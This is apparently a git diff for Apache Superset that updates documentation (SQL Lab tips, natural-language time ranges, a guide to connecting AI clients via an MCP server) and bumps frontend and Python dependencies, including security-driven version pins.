- **Guest tokens expire** — their lifetime is controlled by the `GUEST_TOKEN_JWT_EXP_SECONDS` config (default: 5 minutes). Refresh tokens before they expire using a token refresh mechanism in your host app.
|
||||
- **Row-level security** — pass `rls` rules in the guest token request to restrict which rows are visible to the embedded user.
|
||||
- **Allowed domains** — restrict which host origins can embed a dashboard by setting **Allowed Domains** per-dashboard in the *Embed* settings modal. Superset checks the request's `Referer` header against this list before serving the embedded view; an empty list allows any origin, so configure this explicitly for production.
|
||||
@@ -329,6 +329,27 @@ various options in this section, refer to the
|
||||
Lastly, save your chart as Tutorial Resample and add it to the Tutorial Dashboard. Go to the
|
||||
tutorial dashboard to see the four charts side by side and compare the different outputs.
|
||||
|
||||
### SQL Lab Tips
|
||||
|
||||
**Schema and table browser**: The left-side table browser uses a collapsible treeview — click a schema to expand its tables, and click a table to see its columns and sample data inline. This makes navigating large schemas much faster than the previous flat list.
|
||||
|
||||
**Find in editor**: Press **Ctrl+F** (or **Cmd+F** on Mac) to open the Monaco find/replace widget inside the SQL editor without leaving the editor.
|
||||
|
||||
**Resizable panels**: The dividers between the SQL editor, schema browser, and results pane are draggable. Adjust them to match your workflow and screen size.
|
||||
|
||||
**Dialect-aware Format SQL**: The **Format SQL** button applies the SQL dialect of the currently selected database — Trino, Presto, MySQL, PostgreSQL, etc. — rather than a generic formatter. Switch to a different database in the toolbar and re-format to get dialect-specific output. Jinja template syntax (`{{ }}`, `{% %}`) is preserved during formatting and will not cause format errors.
|
||||
|
||||
### Time Range Natural Language Expressions
|
||||
|
||||
The **Custom** time range picker accepts natural language expressions alongside specific dates:
|
||||
|
||||
- **Relative**: `Last 7 days`, `Last month`, `Last quarter`, `Last year`
|
||||
- **Anchored**: `previous calendar week`, `previous calendar month`
|
||||
- **"First of" expressions**: `first day of this week`, `first day of this month`, `first day of this quarter`, `first day of this year`, `first week of this year`
|
||||
- **Offsets**: `30 days ago`, `1 year ago`, `next week`
|
||||
|
||||
These expressions are evaluated at query time, so saved charts always display data relative to the current date.
|
||||
|
||||
:::resources
|
||||
- [Chart Walkthroughs](https://docs.preset.io/docs/chart-walkthroughs) - Detailed guides for most chart types
|
||||
- [Blog: Why Apache ECharts is the Future of Apache Superset](https://preset.io/blog/2021-4-1-why-echarts/)
|
||||
|
||||
277
docs/docs/using-superset/using-ai-with-superset.mdx
Normal file
277
docs/docs/using-superset/using-ai-with-superset.mdx
Normal file
@@ -0,0 +1,277 @@
|
||||
---
|
||||
title: Using AI with Superset
|
||||
hide_title: true
|
||||
sidebar_position: 5
|
||||
version: 1
|
||||
---
|
||||
|
||||
<!--
|
||||
Licensed to the Apache Software Foundation (ASF) under one
|
||||
or more contributor license agreements. See the NOTICE file
|
||||
distributed with this work for additional information
|
||||
regarding copyright ownership. The ASF licenses this file
|
||||
to you under the Apache License, Version 2.0 (the
|
||||
"License"); you may not use this file except in compliance
|
||||
with the License. You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing,
|
||||
software distributed under the License is distributed on an
|
||||
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
|
||||
KIND, either express or implied. See the License for the
|
||||
specific language governing permissions and limitations
|
||||
under the License.
|
||||
-->
|
||||
|
||||
# Using AI with Superset
|
||||
|
||||
Superset supports AI assistants through the [Model Context Protocol (MCP)](https://modelcontextprotocol.io/). Connect Claude, ChatGPT, or other MCP-compatible clients to explore your data, build charts, create dashboards, and run SQL -- all through natural language.
|
||||
|
||||
:::info
|
||||
Requires Superset 5.0+. Your admin must enable and deploy the MCP server before you can connect.
|
||||
See the **[MCP Server admin guide](/admin-docs/configuration/mcp-server)** for setup instructions.
|
||||
:::
|
||||
|
||||
---
|
||||
|
||||
## What Can AI Do with Superset?
|
||||
|
||||
### Explore Your Data
|
||||
|
||||
Ask your AI assistant to browse what's available in your Superset instance:
|
||||
|
||||
- **List datasets** -- see all datasets you have access to, with filtering and search
|
||||
- **Get dataset details** -- column names, types, available metrics, and filters
|
||||
- **List charts and dashboards** -- find existing visualizations by name or keyword
|
||||
- **Get chart and dashboard details** -- understand what a chart shows, its query, and configuration
|
||||
|
||||
**Example prompts:**
|
||||
> "What datasets are available?"
|
||||
> "Show me the columns in the sales_orders dataset"
|
||||
> "Find dashboards related to revenue"
|
||||
|
||||
### Build Charts
|
||||
|
||||
Describe the visualization you want and AI creates it for you:
|
||||
|
||||
- **Create charts from natural language** -- describe what you want to see and AI picks the right chart type, metrics, and dimensions
|
||||
- **Preview before saving** -- `generate_chart` defaults to `save_chart=False`, showing the chart in Explore before it's committed. Ask AI to save once you're satisfied.
|
||||
- **Modify existing charts** -- `update_chart` also supports preview mode so you can review changes before saving
|
||||
- **Get Explore links** -- open any chart in Superset's Explore view for further refinement
|
||||
|
||||
**Example prompts:**
|
||||
> "Create a bar chart showing monthly revenue by region from the sales dataset"
|
||||
> "Update chart 42 to use a line chart instead"
|
||||
> "Give me a link to explore this chart further"
|
||||
|
||||
### Create Dashboards
|
||||
|
||||
Build dashboards from a collection of charts:
|
||||
|
||||
- **Generate dashboards** -- create a new dashboard with a set of charts, automatically laid out
|
||||
- **Add charts to existing dashboards** -- place a chart on an existing dashboard with automatic positioning
|
||||
|
||||
**Example prompts:**
|
||||
> "Create a dashboard called 'Q4 Sales Overview' with charts 10, 15, and 22"
|
||||
> "Add the revenue trend chart to the executive dashboard"
|
||||
|
||||
### Run SQL Queries
|
||||
|
||||
Execute SQL directly through your AI assistant:
|
||||
|
||||
- **Run queries** -- execute SQL with full Superset RBAC enforcement (you can only query data your roles allow)
|
||||
- **Open SQL Lab** -- get a link to SQL Lab pre-populated with a query, ready to run and explore
|
||||
|
||||
**Example prompts:**
|
||||
> "Run this query: SELECT region, SUM(revenue) FROM sales GROUP BY region"
|
||||
> "Open SQL Lab with a query to show the top 10 customers by order count"
|
||||
|
||||
### Analyze Chart Data
|
||||
|
||||
Pull the raw data behind any chart:
|
||||
|
||||
- **Get chart data** -- retrieve the data a chart displays, with support for JSON, CSV, and Excel export formats
|
||||
- **Inspect results** -- useful for verifying what a visualization shows or feeding data into other tools
|
||||
|
||||
**Example prompts:**
|
||||
> "Get the data behind chart 42"
|
||||
> "Export chart 15 data as CSV"
|
||||
|
||||
### Check Instance Status
|
||||
|
||||
- **Health check** -- verify your Superset instance is up and the MCP connection is working
|
||||
- **Instance info** -- get high-level statistics about your Superset instance (number of datasets, charts, dashboards)
|
||||
|
||||
**Example prompts:**
|
||||
> "Is Superset healthy?"
|
||||
> "How many dashboards are in this instance?"
|
||||
|
||||
---
|
||||
|
||||
## Connecting Your AI Client
|
||||
|
||||
Once your admin has deployed the MCP server, connect your AI client using the instructions below.
|
||||
|
||||
### Claude Desktop
|
||||
|
||||
Edit your Claude Desktop config file:
|
||||
|
||||
- **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
|
||||
- **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
|
||||
- **Linux**: `~/.config/Claude/claude_desktop_config.json`
|
||||
|
||||
```json
|
||||
{
|
||||
"mcpServers": {
|
||||
"superset": {
|
||||
"url": "http://localhost:5008/mcp"
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Restart Claude Desktop. The hammer icon in the chat bar confirms the connection.
|
||||
|
||||
If your admin has enabled JWT authentication, you may need to include a token:
|
||||
|
||||
```json
|
||||
{
|
||||
"mcpServers": {
|
||||
"superset": {
|
||||
"command": "npx",
|
||||
"args": [
|
||||
"-y",
|
||||
"mcp-remote@latest",
|
||||
"http://your-superset-host:5008/mcp",
|
||||
"--header",
|
||||
"Authorization: Bearer YOUR_TOKEN"
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Claude Code (CLI)
|
||||
|
||||
Add to your project's `.mcp.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"mcpServers": {
|
||||
"superset": {
|
||||
"type": "url",
|
||||
"url": "http://localhost:5008/mcp"
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### ChatGPT
|
||||
|
||||
1. Click your profile icon > **Settings** > **Apps and Connectors**
|
||||
2. Enable **Developer Mode** in Advanced Settings
|
||||
3. In the chat composer, press **+** > **Add sources** > **App** > **Connect more** > **Create app**
|
||||
4. Enter a name and your MCP server URL
|
||||
5. Click **I understand and continue**
|
||||
|
||||
:::info
|
||||
ChatGPT MCP connectors require a Pro, Team, Enterprise, or Edu plan.
|
||||
:::
|
||||
|
||||
Ask your admin for the MCP server URL and any authentication tokens you need.
|
||||
|
||||
---
|
||||
|
||||
## Tips for Best Results
|
||||
|
||||
- **Be specific** -- "Create a bar chart of monthly revenue by region from the sales dataset" works better than "Make me a chart"
|
||||
- **Start with exploration** -- ask what datasets and charts exist before creating new ones
|
||||
- **Review AI-generated content** -- always check chart configurations and SQL before saving or sharing
|
||||
- **Use Explore for refinement** -- ask AI for an Explore link, then fine-tune interactively in the Superset UI
|
||||
- **Check permissions if you get errors** -- AI respects Superset's RBAC, so you can only access data your roles allow
|
||||
|
||||
---
|
||||
|
||||
## Available Tools Reference
|
||||
|
||||
### Exploration & Discovery
|
||||
|
||||
| Tool | Description |
|
||||
|------|-------------|
|
||||
| `health_check` | Verify the MCP server is running and connected |
|
||||
| `get_instance_info` | Get instance statistics (dataset, chart, dashboard counts) |
|
||||
| `get_schema` | Discover available charts, datasets, and dashboards with schema info |
|
||||
|
||||
### Datasets
|
||||
|
||||
| Tool | Description |
|
||||
|------|-------------|
|
||||
| `list_datasets` | List datasets with filtering and search |
|
||||
| `get_dataset_info` | Get dataset metadata (columns, metrics, filters) |
|
||||
| `create_virtual_dataset` | Create a virtual dataset from a SQL query |
|
||||
|
||||
### Charts
|
||||
|
||||
| Tool | Description |
|
||||
|------|-------------|
|
||||
| `list_charts` | List charts with filtering and search |
|
||||
| `get_chart_info` | Get chart metadata and configuration |
|
||||
| `get_chart_data` | Retrieve chart data (JSON, CSV, or Excel) |
|
||||
| `get_chart_preview` | Generate a chart preview (URL, ASCII, table, or Vega-Lite) |
|
||||
| `get_chart_type_schema` | Get the configuration schema for a chart type |
|
||||
| `generate_chart` | Create a new chart from a specification (defaults to preview mode — review before saving) |
|
||||
| `update_chart` | Modify an existing chart's configuration (pass `generate_preview=False` to persist immediately instead of returning a preview URL) |
|
||||
| `update_chart_preview` | Update a cached chart preview without saving |
|
||||
| `generate_explore_link` | Generate an Explore URL for interactive visualization |
|
||||
|
||||
### Dashboards
|
||||
|
||||
| Tool | Description |
|
||||
|------|-------------|
|
||||
| `list_dashboards` | List dashboards with filtering and search |
|
||||
| `get_dashboard_info` | Get dashboard metadata and layout |
|
||||
| `generate_dashboard` | Create a new dashboard with specified charts |
|
||||
| `add_chart_to_existing_dashboard` | Add a chart to an existing dashboard |
|
||||
|
||||
### SQL
|
||||
|
||||
| Tool | Description |
|
||||
|------|-------------|
|
||||
| `execute_sql` | Run a SQL query with RBAC enforcement |
|
||||
| `save_sql_query` | Persist a SQL query to SQL Lab's saved queries |
|
||||
| `open_sql_lab_with_context` | Open SQL Lab with a pre-populated query |
|
||||
|
||||
### Databases
|
||||
|
||||
| Tool | Description |
|
||||
|------|-------------|
|
||||
| `list_databases` | List configured database connections |
|
||||
| `get_database_info` | Get details about a specific database connection |
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### "Connection refused" or "Cannot connect"
|
||||
|
||||
- Confirm the MCP server URL with your admin
|
||||
- For Claude Desktop: fully quit the app (not just close the window) and restart after config changes
|
||||
- Check that the URL path ends with `/mcp` (e.g., `http://localhost:5008/mcp`)
|
||||
|
||||
### "Permission denied" or missing data
|
||||
|
||||
- Superset's RBAC controls what you can access through AI, just like in the Superset UI
|
||||
- Ask your admin to verify your roles and permissions
|
||||
- Try accessing the same data through the Superset web UI to confirm your access
|
||||
|
||||
### "Response too large"
|
||||
|
||||
- Ask for smaller result sets: use filters, reduce `page_size`, or request specific columns
|
||||
- Example: "Show me the top 10 rows from the sales dataset" instead of "Show me all sales data"
|
||||
|
||||
### AI doesn't see Superset tools
|
||||
|
||||
- Verify the connection in your AI client (e.g., the hammer icon in Claude Desktop)
|
||||
- Ask the AI "What Superset tools are available?" to confirm the connection
|
||||
- Restart your AI client if you recently changed the configuration
|
||||
@@ -40,13 +40,13 @@
|
||||
"version:remove:components": "node scripts/manage-versions.mjs remove components"
|
||||
},
|
||||
"dependencies": {
|
||||
"@ant-design/icons": "^6.1.0",
|
||||
"@docusaurus/core": "3.9.2",
|
||||
"@docusaurus/faster": "^3.9.2",
|
||||
"@docusaurus/plugin-client-redirects": "3.9.2",
|
||||
"@docusaurus/preset-classic": "3.9.2",
|
||||
"@docusaurus/theme-live-codeblock": "^3.9.2",
|
||||
"@docusaurus/theme-mermaid": "^3.9.2",
|
||||
"@ant-design/icons": "^6.1.1",
|
||||
"@docusaurus/core": "^3.10.0",
|
||||
"@docusaurus/faster": "^3.10.0",
|
||||
"@docusaurus/plugin-client-redirects": "^3.10.0",
|
||||
"@docusaurus/preset-classic": "3.10.0",
|
||||
"@docusaurus/theme-live-codeblock": "^3.10.0",
|
||||
"@docusaurus/theme-mermaid": "^3.10.0",
|
||||
"@emotion/core": "^11.0.0",
|
||||
"@emotion/react": "^11.13.3",
|
||||
"@emotion/styled": "^11.14.1",
|
||||
@@ -67,12 +67,12 @@
|
||||
"@storybook/preview-api": "^8.6.18",
|
||||
"@storybook/theming": "^8.6.15",
|
||||
"@superset-ui/core": "^0.20.4",
|
||||
"@swc/core": "^1.15.17",
|
||||
"antd": "^6.3.2",
|
||||
"baseline-browser-mapping": "^2.10.0",
|
||||
"caniuse-lite": "^1.0.30001775",
|
||||
"docusaurus-plugin-openapi-docs": "^4.6.0",
|
||||
"docusaurus-theme-openapi-docs": "^4.6.0",
|
||||
"@swc/core": "^1.15.30",
|
||||
"antd": "^6.3.6",
|
||||
"baseline-browser-mapping": "^2.10.21",
|
||||
"caniuse-lite": "^1.0.30001790",
|
||||
"docusaurus-plugin-openapi-docs": "^5.0.1",
|
||||
"docusaurus-theme-openapi-docs": "^5.0.1",
|
||||
"js-yaml": "^4.1.1",
|
||||
"js-yaml-loader": "^1.2.2",
|
||||
"json-bigint": "^1.0.0",
|
||||
@@ -86,28 +86,28 @@
|
||||
"remark-import-partial": "^0.0.2",
|
||||
"reselect": "^5.1.1",
|
||||
"storybook": "^8.6.18",
|
||||
"swagger-ui-react": "^5.32.0",
|
||||
"swagger-ui-react": "^5.32.4",
|
||||
"swc-loader": "^0.2.7",
|
||||
"tinycolor2": "^1.4.2",
|
||||
"unist-util-visit": "^5.1.0"
|
||||
},
|
||||
"devDependencies": {
|
||||
"@docusaurus/module-type-aliases": "^3.9.1",
|
||||
"@docusaurus/tsconfig": "^3.9.2",
|
||||
"@docusaurus/module-type-aliases": "^3.10.0",
|
||||
"@docusaurus/tsconfig": "^3.10.0",
|
||||
"@eslint/js": "^9.39.2",
|
||||
"@types/js-yaml": "^4.0.9",
|
||||
"@types/react": "^19.1.8",
|
||||
"@typescript-eslint/eslint-plugin": "^8.52.0",
|
||||
"@typescript-eslint/parser": "^8.56.1",
|
||||
"@typescript-eslint/parser": "^8.59.0",
|
||||
"eslint": "^9.39.2",
|
||||
"eslint-config-prettier": "^10.1.8",
|
||||
"eslint-plugin-prettier": "^5.5.5",
|
||||
"eslint-plugin-react": "^7.37.5",
|
||||
"globals": "^17.4.0",
|
||||
"prettier": "^3.8.1",
|
||||
"typescript": "~5.9.3",
|
||||
"typescript-eslint": "^8.56.1",
|
||||
"webpack": "^5.105.4"
|
||||
"globals": "^17.5.0",
|
||||
"prettier": "^3.8.3",
|
||||
"typescript": "~6.0.3",
|
||||
"typescript-eslint": "^8.59.0",
|
||||
"webpack": "^5.106.2"
|
||||
},
|
||||
"browserslist": {
|
||||
"production": [
|
||||
@@ -124,7 +124,8 @@
|
||||
"resolutions": {
|
||||
"react-redux": "^9.2.0",
|
||||
"@reduxjs/toolkit": "^2.5.0",
|
||||
"baseline-browser-mapping": "^2.9.19"
|
||||
"baseline-browser-mapping": "^2.9.19",
|
||||
"webpackbar": "^7.0.0"
|
||||
},
|
||||
"packageManager": "yarn@1.22.22+sha1.ac34549e6aa8e7ead463a7407e1c7390f61a6610"
|
||||
}
|
||||
|
||||
@@ -129,6 +129,30 @@ def add_missing_schemas(spec: dict[str, Any]) -> tuple[dict[str, Any], list[str]
|
||||
}
|
||||
fixed.append("DashboardColorsConfigUpdateSchema")
|
||||
|
||||
# DashboardChartCustomizationsConfigUpdateSchema (dashboards/schemas.py)
|
||||
if "DashboardChartCustomizationsConfigUpdateSchema" not in schemas:
|
||||
schemas["DashboardChartCustomizationsConfigUpdateSchema"] = {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"deleted": {
|
||||
"type": "array",
|
||||
"items": {"type": "string"},
|
||||
"description": "List of deleted chart customization IDs.",
|
||||
},
|
||||
"modified": {
|
||||
"type": "array",
|
||||
"items": {"type": "object"},
|
||||
"description": "List of modified chart customizations.",
|
||||
},
|
||||
"reordered": {
|
||||
"type": "array",
|
||||
"items": {"type": "string"},
|
||||
"description": "List of chart customization IDs in new order.",
|
||||
},
|
||||
},
|
||||
}
|
||||
fixed.append("DashboardChartCustomizationsConfigUpdateSchema")
|
||||
|
||||
# FormatQueryPayloadSchema - based on superset/sqllab/schemas.py
|
||||
if "FormatQueryPayloadSchema" not in schemas:
|
||||
schemas["FormatQueryPayloadSchema"] = {
|
||||
@@ -295,6 +319,7 @@ TAG_DESCRIPTIONS = {
|
||||
"Security Roles": "Manage security roles and their permissions.",
|
||||
"Security Users": "Manage user accounts.",
|
||||
"Tags": "Organize assets with tags.",
|
||||
"Themes": "Manage UI themes for customizing Superset's appearance.",
|
||||
"User": "User profile and preferences.",
|
||||
}
|
||||
|
||||
|
||||
@@ -202,7 +202,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \\
|
||||
mdx += `| Method | Endpoint | Description |\n`;
|
||||
mdx += `|--------|----------|-------------|\n`;
|
||||
for (const ep of tagEndpoints['Security']) {
|
||||
mdx += `| \`${ep.method}\` | [${ep.summary}](./api/${ep.slug}) | \`${ep.path}\` |\n`;
|
||||
mdx += `| \`${ep.method}\` | [${ep.summary}](/developer-docs/api/${ep.slug}) | \`${ep.path}\` |\n`;
|
||||
}
|
||||
mdx += '\n';
|
||||
renderedTags.add('Security');
|
||||
@@ -229,7 +229,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \\
|
||||
mdx += `|--------|----------|-------------|\n`;
|
||||
|
||||
for (const ep of endpoints) {
|
||||
mdx += `| \`${ep.method}\` | [${ep.summary}](./api/${ep.slug}) | \`${ep.path}\` |\n`;
|
||||
mdx += `| \`${ep.method}\` | [${ep.summary}](/developer-docs/api/${ep.slug}) | \`${ep.path}\` |\n`;
|
||||
}
|
||||
|
||||
mdx += `\n</details>\n\n`;
|
||||
@@ -252,7 +252,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \\
|
||||
mdx += `|--------|----------|-------------|\n`;
|
||||
|
||||
for (const ep of endpoints) {
|
||||
mdx += `| \`${ep.method}\` | [${ep.summary}](./api/${ep.slug}) | \`${ep.path}\` |\n`;
|
||||
mdx += `| \`${ep.method}\` | [${ep.summary}](/developer-docs/api/${ep.slug}) | \`${ep.path}\` |\n`;
|
||||
}
|
||||
|
||||
mdx += `\n</details>\n\n`;
|
||||
|
||||
6
docs/static/feature-flags.json
vendored
6
docs/static/feature-flags.json
vendored
@@ -51,6 +51,12 @@
|
||||
"lifecycle": "development",
|
||||
"description": "Enable Superset extensions for custom functionality without modifying core"
|
||||
},
|
||||
{
|
||||
"name": "FAB_API_KEY_ENABLED",
|
||||
"default": false,
|
||||
"lifecycle": "development",
|
||||
"description": "Enable API key authentication via FAB SecurityManager When enabled, users can create/manage API keys in the User Info page"
|
||||
},
|
||||
{
|
||||
"name": "GRANULAR_EXPORT_CONTROLS",
|
||||
"default": false,
|
||||
|
||||
BIN
docs/static/img/logos/hifadih.png
vendored
Normal file
BIN
docs/static/img/logos/hifadih.png
vendored
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 18 KiB |
5791
docs/static/resources/openapi.json
vendored
5791
docs/static/resources/openapi.json
vendored
File diff suppressed because it is too large
Load Diff
@@ -3,6 +3,7 @@
|
||||
"extends": "@docusaurus/tsconfig",
|
||||
"compilerOptions": {
|
||||
"baseUrl": ".",
|
||||
"ignoreDeprecations": "6.0",
|
||||
"skipLibCheck": true,
|
||||
"noImplicitAny": false,
|
||||
"strict": false,
|
||||
|
||||
@@ -109,6 +109,14 @@ SECRET_KEY = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'
|
||||
|
||||
You can generate a strong secure key with `openssl rand -base64 42`.
|
||||
|
||||
Alternatively, you can set the secret key using `SUPERSET_SECRET_KEY` environment variable:
|
||||
|
||||
On a Unix-based system, such as Linux or macOS, you can do so by running the following command in your terminal:
|
||||
|
||||
```bash
|
||||
export SUPERSET_SECRET_KEY=$(openssl rand -base64 42)
|
||||
```
|
||||
|
||||
:::caution Use a strong secret key
|
||||
This key will be used for securely signing session cookies and encrypting sensitive information stored in Superset's application metadata database.
|
||||
Your deployment must use a complex, unique key.
|
||||
|
||||
@@ -35,7 +35,7 @@ or a view.
|
||||
When working with tables, the solution would be to create a table that contains all the fields
|
||||
needed for your analysis, most likely through some scheduled batch process.
|
||||
|
||||
A view is a simple logical layer that abstracts an arbitrary SQL queries as a virtual table. This can
|
||||
A view is a simple logical layer that abstracts an arbitrary SQL query as a virtual table. This can
|
||||
allow you to join and union multiple tables and to apply some transformation using arbitrary SQL
|
||||
expressions. The limitation there is your database performance, as Superset effectively will run a
|
||||
query on top of your query (view). A good practice may be to limit yourself to joining your main
|
||||
|
||||
2373
docs/yarn.lock
2373
docs/yarn.lock
File diff suppressed because it is too large
Load Diff
@@ -48,7 +48,7 @@ dependencies = [
|
||||
"cryptography>=42.0.4, <47.0.0",
|
||||
"deprecation>=2.1.0, <2.2.0",
|
||||
"flask>=2.2.5, <4.0.0",
|
||||
"flask-appbuilder>=5.0.2,<6",
|
||||
"flask-appbuilder>=5.2.1, <6.0.0",
|
||||
"flask-caching>=2.1.0, <3",
|
||||
"flask-compress>=1.13, <2.0",
|
||||
"flask-talisman>=1.0.0, <2.0",
|
||||
@@ -89,10 +89,11 @@ dependencies = [
|
||||
"python-dateutil",
|
||||
"python-dotenv", # optional dependencies for Flask but required for Superset, see https://flask.palletsprojects.com/en/stable/installation/#optional-dependencies
|
||||
"pygeohash",
|
||||
"pyarrow>=16.1.0, <19", # before upgrading pyarrow, check that all db dependencies support this, see e.g. https://github.com/apache/superset/pull/34693
|
||||
"pyarrow>=16.1.0, <21", # before upgrading pyarrow, check that all db dependencies support this, see e.g. https://github.com/apache/superset/pull/34693
|
||||
"pyyaml>=6.0.0, <7.0.0",
|
||||
"PyJWT>=2.4.0, <3.0",
|
||||
"redis>=5.0.0, <6.0",
|
||||
"rison>=2.0.0, <3.0",
|
||||
"selenium>=4.14.0, <5.0",
|
||||
"shillelagh[gsheetsapi]>=1.4.3, <2.0",
|
||||
"sshtunnel>=0.4.0, <0.5",
|
||||
@@ -144,7 +145,7 @@ solr = ["sqlalchemy-solr >= 0.2.0"]
|
||||
elasticsearch = ["elasticsearch-dbapi>=0.2.12, <0.3.0"]
|
||||
exasol = ["sqlalchemy-exasol >= 2.4.0, <3.0"]
|
||||
excel = ["xlrd>=1.2.0, <1.3"]
|
||||
fastmcp = ["fastmcp==2.14.3"]
|
||||
fastmcp = ["fastmcp>=3.1.0,<4.0"]
|
||||
firebird = ["sqlalchemy-firebird>=0.7.0, <0.8"]
|
||||
firebolt = ["firebolt-sqlalchemy>=1.0.0, <2"]
|
||||
gevent = ["gevent>=23.9.1"]
|
||||
@@ -183,6 +184,7 @@ risingwave = ["sqlalchemy-risingwave"]
|
||||
shillelagh = ["shillelagh[all]>=1.4.3, <2"]
|
||||
singlestore = ["sqlalchemy-singlestoredb>=1.1.1, <2"]
|
||||
snowflake = ["snowflake-sqlalchemy>=1.2.4, <2"]
|
||||
sqlite = ["syntaqlite>=0.1.0"]
|
||||
spark = [
|
||||
"pyhive[hive]>=0.6.5;python_version<'3.11'",
|
||||
"pyhive[hive_pure_sasl]>=0.7",
|
||||
@@ -226,6 +228,7 @@ development = [
|
||||
"ruff",
|
||||
"sqloxide",
|
||||
"statsd",
|
||||
"syntaqlite>=0.1.0",
|
||||
]
|
||||
|
||||
[project.urls]
|
||||
@@ -238,7 +241,7 @@ combine_as_imports = true
|
||||
include_trailing_comma = true
|
||||
line_length = 88
|
||||
known_first_party = "superset, apache-superset-core, apache-superset-extensions-cli"
|
||||
known_third_party = "alembic, apispec, backoff, celery, click, colorama, cron_descriptor, croniter, cryptography, dateutil, deprecation, flask, flask_appbuilder, flask_babel, flask_caching, flask_compress, flask_jwt_extended, flask_login, flask_migrate, flask_sqlalchemy, flask_talisman, flask_testing, flask_wtf, freezegun, geohash, geopy, holidays, humanize, isodate, jinja2, jwt, markdown, markupsafe, marshmallow, marshmallow-union, msgpack, nh3, numpy, pandas, parameterized, parsedatetime, pgsanity, polyline, prison, progress, pyarrow, sqlalchemy_bigquery, pyhive, pyparsing, pytest, pytest_mock, pytz, redis, requests, selenium, setuptools, shillelagh, simplejson, slack, sqlalchemy, sqlalchemy_utils, typing_extensions, urllib3, werkzeug, wtforms, wtforms_json, yaml"
|
||||
known_third_party = "alembic, apispec, backoff, celery, click, colorama, cron_descriptor, croniter, cryptography, dateutil, deprecation, flask, flask_appbuilder, flask_babel, flask_caching, flask_compress, flask_jwt_extended, flask_login, flask_migrate, flask_sqlalchemy, flask_talisman, flask_testing, flask_wtf, freezegun, geohash, geopy, holidays, humanize, isodate, jinja2, jwt, markdown, markupsafe, marshmallow, marshmallow-union, msgpack, nh3, numpy, pandas, parameterized, parsedatetime, pgsanity, polyline, rison, progress, pyarrow, sqlalchemy_bigquery, pyhive, pyparsing, pytest, pytest_mock, pytz, redis, requests, selenium, setuptools, shillelagh, simplejson, slack, sqlalchemy, sqlalchemy_utils, syntaqlite, typing_extensions, urllib3, werkzeug, wtforms, wtforms_json, yaml"
|
||||
multi_line_output = 3
|
||||
order_by_type = false
|
||||
|
||||
@@ -372,6 +375,7 @@ unfixable = []
|
||||
dummy-variable-rgx = "^(_+|(_+[a-zA-Z0-9_]*[a-zA-Z0-9]+?))$"
|
||||
|
||||
[tool.ruff.lint.per-file-ignores]
|
||||
"superset/mcp_service/app.py" = ["S608", "E501"] # LLM instruction text: SQL examples (S608) and long lines in multiline string (E501)
|
||||
"scripts/*" = ["TID251"]
|
||||
"setup.py" = ["TID251"]
|
||||
"superset/config.py" = ["TID251"]
|
||||
|
||||
@@ -25,6 +25,16 @@ filelock>=3.20.3,<4.0.0
|
||||
# Security: decompression bomb fix (required by aiohttp 3.13.3)
|
||||
brotli>=1.2.0,<2.0.0
|
||||
numexpr>=2.9.0
|
||||
# Security: CVE-2026-34073 (MEDIUM) - Improper Certificate Validation
|
||||
cryptography>=46.0.7,<47.0.0
|
||||
# Security: Snyk - XSS vulnerability in Mako templates
|
||||
mako>=1.3.11,<2.0.0
|
||||
# Security: CVE-2024-52338 (CRITICAL) - Deserialization of untrusted data in IPC/Parquet readers
|
||||
pyarrow>=20.0.0,<21.0.0
|
||||
# Security: CVE-2026-27459 - pyopenssl certificate validation
|
||||
pyopenssl>=26.0.0,<27.0.0
|
||||
# Security: CVE-2026-25645 (MEDIUM) - Insecure Temporary File
|
||||
requests>=2.33.0,<3.0.0
|
||||
|
||||
# 5.0.0 has a sensitive deprecation used in other libs
|
||||
# -> https://github.com/aio-libs/async-timeout/blob/master/CHANGES.rst#500-2024-10-31
|
||||
|
||||
@@ -86,8 +86,9 @@ cron-descriptor==1.4.5
|
||||
# via apache-superset (pyproject.toml)
|
||||
croniter==6.0.0
|
||||
# via apache-superset (pyproject.toml)
|
||||
cryptography==46.0.5
|
||||
cryptography==46.0.7
|
||||
# via
|
||||
# -r requirements/base.in
|
||||
# apache-superset (pyproject.toml)
|
||||
# paramiko
|
||||
# pyopenssl
|
||||
@@ -120,7 +121,7 @@ flask==2.3.3
|
||||
# flask-session
|
||||
# flask-sqlalchemy
|
||||
# flask-wtf
|
||||
flask-appbuilder==5.0.2
|
||||
flask-appbuilder==5.2.1
|
||||
# via
|
||||
# apache-superset (pyproject.toml)
|
||||
# apache-superset-core
|
||||
@@ -205,11 +206,12 @@ kombu==5.5.3
|
||||
# via celery
|
||||
limits==5.1.0
|
||||
# via flask-limiter
|
||||
mako==1.3.10
|
||||
mako==1.3.11
|
||||
# via
|
||||
# -r requirements/base.in
|
||||
# apache-superset (pyproject.toml)
|
||||
# alembic
|
||||
markdown==3.8
|
||||
markdown==3.8.1
|
||||
# via apache-superset (pyproject.toml)
|
||||
markdown-it-py==3.0.0
|
||||
# via rich
|
||||
@@ -247,7 +249,6 @@ numpy==1.26.4
|
||||
# bottleneck
|
||||
# numexpr
|
||||
# pandas
|
||||
# pyarrow
|
||||
odfpy==1.4.1
|
||||
# via pandas
|
||||
openapi-schema-validator==0.6.3
|
||||
@@ -279,7 +280,7 @@ parsedatetime==2.6
|
||||
# via apache-superset (pyproject.toml)
|
||||
pgsanity==0.2.9
|
||||
# via apache-superset (pyproject.toml)
|
||||
pillow==11.3.0
|
||||
pillow==12.2.0
|
||||
# via apache-superset (pyproject.toml)
|
||||
platformdirs==4.3.8
|
||||
# via requests-cache
|
||||
@@ -291,9 +292,11 @@ prison==0.2.1
|
||||
# via flask-appbuilder
|
||||
